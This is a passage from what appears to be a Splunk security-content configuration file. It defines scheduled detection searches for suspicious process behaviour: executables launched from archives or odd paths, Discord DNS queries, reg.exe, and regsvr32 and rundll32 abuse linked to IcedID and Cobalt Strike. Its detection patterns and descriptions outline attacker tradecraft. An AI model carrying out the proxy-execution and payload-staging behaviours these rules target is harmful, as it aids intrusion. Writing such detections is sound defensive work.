used by adversaries and malware to execute scripts or evade defenses. This TTP may detect some normal software installation or user behaviors where opening archive files is common. action.notable.param.rule_title = Suspicious Process Executed From Container File action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*.ZIP\\*","*.ISO\\*","*.IMG\\*","*.CAB\\*","*.TAR\\*","*.GZ\\*","*.RAR\\*","*.7Z\\*") AND Processes.action="allowed" by Processes.dest Processes.parent_process Processes.process Processes.user| `drop_dm_object_name(Processes)`| regex process="(?i).*(ZIP|ISO|IMG|CAB|TAR|GZ|RAR|7Z)\\\\.+\.(BAT|BIN|CAB|CMD|COM|CPL|EX_|EXE|GADGET|INF1|INS|INX||HTM|HTML|ISU|JAR|JOB|JS|JSE|LNK|MSC|MSI|MSP|MST|PAF|PIF|PS1|REG|RGS|SCR|SCT|SHB|SHS|U3P|VB|VBE|VBS|VBSCRIPT|WS|WSF|WSH)\"?$" | rex field=process "(?i).+\\\\(?[^\\\]+\.(ZIP|ISO|IMG|CAB|TAR|GZ|RAR|7Z))\\\\((.+\\\\)+)?(?.+\.(BAT|BIN|CAB|CMD|COM|CPL|EX_|EXE|GADGET|INF1|INS|INX||HTM|HTML|ISU|JAR|JOB|JS|JSE|LNK|MSC|MSI|MSP|MST|PAF|PIF|PS1|REG|RGS|SCR|SCT|SHB|SHS|U3P|VB|VBE|VBS|VBSCRIPT|WS|WSF|WSH))\"?$"| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_process_executed_from_container_file_filter` [ESCU - Suspicious Process File Path - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a suspicious processes running in file paths that are not typically associated with legitimate software. Adversaries often employ this technique to drop and execute malicious executables in accessible locations that do not require administrative privileges. By monitoring for processes running in such unconventional file paths, we can identify potential indicators of compromise and proactively respond to malicious activity. This analytic plays a crucial role in enhancing system security by pinpointing suspicious behaviors commonly associated with malware and unauthorized software execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies a suspicious processes running in file paths that are not typically associated with legitimate software. Adversaries often employ this technique to drop and execute malicious executables in accessible locations that do not require administrative privileges. By monitoring for processes running in such unconventional file paths, we can identify potential indicators of compromise and proactively respond to malicious activity. This analytic plays a crucial role in enhancing system security by pinpointing suspicious behaviors commonly associated with malware and unauthorized software execution. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may allow execution of specific binaries in non-standard paths. Filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Process File Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Double Zero Destructor", "Graceful Wipe Out Attack", "AsyncRAT", "WhisperGate", "Prestige Ransomware", "DarkGate Malware", "AgentTesla", "Brute Ratel C4", "RedLine Stealer", "Rhysida Ransomware", "Swift Slicer", "IcedID", "DarkCrystal RAT", "Chaos Ransomware", "PlugX", "Industroyer2", "Azorult", "Remcos", "XMRig", "Qakbot", "Volt Typhoon", "Hermetic Wiper", "Warzone RAT", "Trickbot", "Amadey", "BlackByte Ransomware", "LockBit Ransomware", "CISA AA23-347A", "Data Destruction", "Phemedrone Stealer"] action.risk = 1 action.risk.param._risk_message = Suspicious process $process_name$ running from a suspicious process path- $process_path$ on host- $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"threat_object_field": "process_path", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Process File Path - Rule action.correlationsearch.annotations = {"analytic_story": ["Double Zero Destructor", "Graceful Wipe Out Attack", "AsyncRAT", "WhisperGate", "Prestige Ransomware", "DarkGate Malware", "AgentTesla", "Brute Ratel C4", "RedLine Stealer", "Rhysida Ransomware", "Swift Slicer", "IcedID", "DarkCrystal RAT", "Chaos Ransomware", "PlugX", "Industroyer2", "Azorult", "Remcos", "XMRig", "Qakbot", "Volt Typhoon", "Hermetic Wiper", "Warzone RAT", "Trickbot", "Amadey", "BlackByte Ransomware", "LockBit Ransomware", "CISA AA23-347A", "Data Destruction", "Phemedrone Stealer"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a suspicious processes running in file paths that are not typically associated with legitimate software. Adversaries often employ this technique to drop and execute malicious executables in accessible locations that do not require administrative privileges. By monitoring for processes running in such unconventional file paths, we can identify potential indicators of compromise and proactively respond to malicious activity. This analytic plays a crucial role in enhancing system security by pinpointing suspicious behaviors commonly associated with malware and unauthorized software execution. action.notable.param.rule_title = Suspicious Process File Path action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_path = "*\\windows\\fonts\\*" OR Processes.process_path = "*\\windows\\temp\\*" OR Processes.process_path = "*\\users\\public\\*" OR Processes.process_path = "*\\windows\\debug\\*" OR Processes.process_path = "*\\Users\\Administrator\\Music\\*" OR Processes.process_path = "*\\Windows\\servicing\\*" OR Processes.process_path = "*\\Users\\Default\\*" OR Processes.process_path = "*Recycle.bin*" OR Processes.process_path = "*\\Windows\\Media\\*" OR Processes.process_path = "\\Windows\\repair\\*" OR Processes.process_path = "*\\temp\\*" OR Processes.process_path = "*\\PerfLogs\\*" by Processes.parent_process_name Processes.parent_process Processes.process_path Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_process_file_path_filter` [ESCU - Suspicious Process With Discord DNS Query - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a process making a DNS query to Discord, a well known instant messaging and digital distribution platform. Discord can be abused by adversaries, as seen in the WhisperGate campaign, to host and download malicious. external files. A process resolving a Discord DNS name could be an indicator of malware trying to download files from Discord for further execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.005", "T1059"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies a process making a DNS query to Discord, a well known instant messaging and digital distribution platform. Discord can be abused by adversaries, as seen in the WhisperGate campaign, to host and download malicious. external files. A process resolving a Discord DNS name could be an indicator of malware trying to download files from Discord for further execution. action.escu.how_to_implement = his detection relies on sysmon logs with the Event ID 22, DNS Query. action.escu.known_false_positives = Noise and false positive can be seen if the following instant messaging is allowed to use within corporate network. In this case, a filter is needed. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Process With Discord DNS Query - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Data Destruction", "WhisperGate"] action.risk = 1 action.risk.param._risk_message = suspicious process $process_name$ has a dns query in $QueryName$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Process With Discord DNS Query - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "WhisperGate"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.005", "T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=22 QueryName IN ("*discord*") Image != "*\\AppData\\Local\\Discord\\*" AND Image != "*\\Program Files*" AND Image != "discord.exe" | stats count min(_time) as firstTime max(_time) as lastTime by Image QueryName QueryStatus process_name QueryResults Computer | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_process_with_discord_dns_query_filter` [ESCU - Suspicious Reg exe Process - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for reg.exe being launched from a command prompt not started by the user. When a user launches cmd.exe, the parent process is usually explorer.exe. This search filters out those instances. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for reg.exe being launched from a command prompt not started by the user. When a user launches cmd.exe, the parent process is usually explorer.exe. This search filters out those instances. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It's possible for system administrators to write scripts that exhibit this behavior. If this is the case, the search will need to be modified to filter them out. action.escu.creation_date = 2020-07-22 action.escu.modification_date = 2020-07-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Reg exe Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Disabling Security Tools", "DHS Report TA18-074A"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to add a registry entry. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 35}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Reg exe Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Disabling Security Tools", "DHS Report TA18-074A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.parent_process_name != explorer.exe Processes.process_name =cmd.exe by Processes.user Processes.process_name Processes.parent_process_name Processes.dest Processes.process_id Processes.parent_process_id | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search [| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.parent_process_name=cmd.exe Processes.process_name= reg.exe by Processes.parent_process_id Processes.dest Processes.process_name | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename parent_process_id as process_id |dedup process_id| table process_id dest] | `suspicious_reg_exe_process_filter` [ESCU - Suspicious Regsvr32 Register Suspicious Path - Rule] action.escu = 0 action.escu.enabled = 1 description = Adversaries may abuse Regsvr32.exe to proxy execution of malicious code by using non-standard file extensions to load DLLs. Upon investigating, look for network connections to remote destinations (internal or external). Review additional parrallel processes and child processes for additional activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.010"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Adversaries may abuse Regsvr32.exe to proxy execution of malicious code by using non-standard file extensions to load DLLs. Upon investigating, look for network connections to remote destinations (internal or external). Review additional parrallel processes and child processes for additional activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives with the query restricted to specified paths. Add more world writeable paths as tuning continues. action.escu.creation_date = 2023-03-02 action.escu.modification_date = 2023-03-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Regsvr32 Register Suspicious Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Regsvr32 Activity", "IcedID", "Living Off The Land", "Qakbot"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to evade detection by using a non-standard file extension. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 35}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Regsvr32 Register Suspicious Path - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Regsvr32 Activity", "IcedID", "Living Off The Land", "Qakbot"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.010"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Adversaries may abuse Regsvr32.exe to proxy execution of malicious code by using non-standard file extensions to load DLLs. Upon investigating, look for network connections to remote destinations (internal or external). Review additional parrallel processes and child processes for additional activity. action.notable.param.rule_title = Suspicious Regsvr32 Register Suspicious Path action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` Processes.process IN ("*\\appdata\\*", "*\\programdata\\*","*\\windows\\temp\\*") NOT (Processes.process IN ("*.dll*", "*.ax*", "*.ocx*")) by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_regsvr32_register_suspicious_path_filter` [ESCU - Suspicious Rundll32 dllregisterserver - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies rundll32.exe using dllregisterserver on the command line to load a DLL. When a DLL is registered, the DllRegisterServer method entry point in the DLL is invoked. This is typically seen when a DLL is being registered on the system. Not every instance is considered malicious, but it will capture malicious use of it. During investigation, review the parent process and parrellel processes executing. Capture the DLL being loaded and inspect further. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies rundll32.exe using dllregisterserver on the command line to load a DLL. When a DLL is registered, the DllRegisterServer method entry point in the DLL is invoked. This is typically seen when a DLL is being registered on the system. Not every instance is considered malicious, but it will capture malicious use of it. During investigation, review the parent process and parrellel processes executing. Capture the DLL being loaded and inspect further. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This is likely to produce false positives and will require some filtering. Tune the query by adding command line paths to known good DLLs, or filtering based on parent process names. action.escu.creation_date = 2021-02-09 action.escu.modification_date = 2021-02-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Rundll32 dllregisterserver - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Living Off The Land", "IcedID"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to register a DLL. code action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 35}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Rundll32 dllregisterserver - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Living Off The Land", "IcedID"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies rundll32.exe using dllregisterserver on the command line to load a DLL. When a DLL is registered, the DllRegisterServer method entry point in the DLL is invoked. This is typically seen when a DLL is being registered on the system. Not every instance is considered malicious, but it will capture malicious use of it. During investigation, review the parent process and parrellel processes executing. Capture the DLL being loaded and inspect further. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.notable.param.rule_title = Suspicious Rundll32 dllregisterserver action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*dllregisterserver* by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_rundll32_dllregisterserver_filter` [ESCU - Suspicious Rundll32 no Command Line Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may use a moved copy of rundll32, triggering a false positive. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Rundll32 no Command Line Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Cobalt Strike", "BlackByte Ransomware", "PrintNightmare CVE-2021-34527", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = Suspicious rundll32.exe process with no command line arguments executed on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Rundll32 no Command Line Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Cobalt Strike", "BlackByte Ransomware", "PrintNightmare CVE-2021-34527", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2021-34527"], "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.notable.param.rule_title = Suspicious Rundll32 no Command Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_rundll32` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(rundll32\.exe.{0,4}$)" | `suspicious_rundll32_no_command_line_arguments_filter` [ESCU - Suspicious Rundll32 PluginInit - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious rundll32.exe process with plugininit parameter. This technique is commonly seen in IcedID malware to execute its initial dll stager to download another payload to the compromised machine. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious rundll32.exe process with plugininit parameter. This technique is commonly seen in IcedID malware to execute its initial dll stager to download another payload to the compromised machine. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = third party application may used this dll export name to execute function. action.escu.creation_date = 2021-07-26 action.escu.modification_date = 2021-07-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Rundll32 PluginInit - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["IcedID"] action.risk = 1 action.risk.param._risk_message = rundll32 process $process_name$ with commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Rundll32 PluginInit - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID"], "cis20": ["CIS 10"], "confidence": 70, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious rundll32.exe process with plugininit parameter. This technique is commonly seen in IcedID malware to execute its initial dll stager to download another payload to the compromised machine. action.notable.param.rule_title = Suspicious Rundll32 PluginInit action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*PluginInit* by Processes.process_name Processes.process Processes.parent_process_name Processes.original_file_name Processes.parent_process Processes.process_id Processes.parent_process_id Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_rundll32_plugininit_filter` [ESCU - Suspicious Rundll32 StartW - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies rundll32.exe executing a DLL function name, Start and StartW, on the command line that is commonly observed with Cobalt Strike x86 and x64 DLL payloads. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. Typically, the DLL will be written and loaded from a world writeable path or user location. In most instances it will not have a valid certificate (Unsigned). During investigation, review the parent process and other parallel application execution. Capture and triage the DLL in question. In the instance of Cobalt Strike, rundll32.exe is the default process it opens and injects shellcode into. This default process can be changed, but typically is not. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies rundll32.exe executing a DLL function name, Start and StartW, on the command line that is commonly observed with Cobalt Strike x86 and x64 DLL payloads. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. Typically, the DLL will be written and loaded from a world writeable path or user location. In most instances it will not have a valid certificate (Unsigned). During investigation, review the parent process and other parallel application execution. Capture and triage the DLL in question. In the instance of Cobalt Strike, rundll32.exe is the default process it opens and injects shellcode into. This default process can be changed, but typically is not. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the 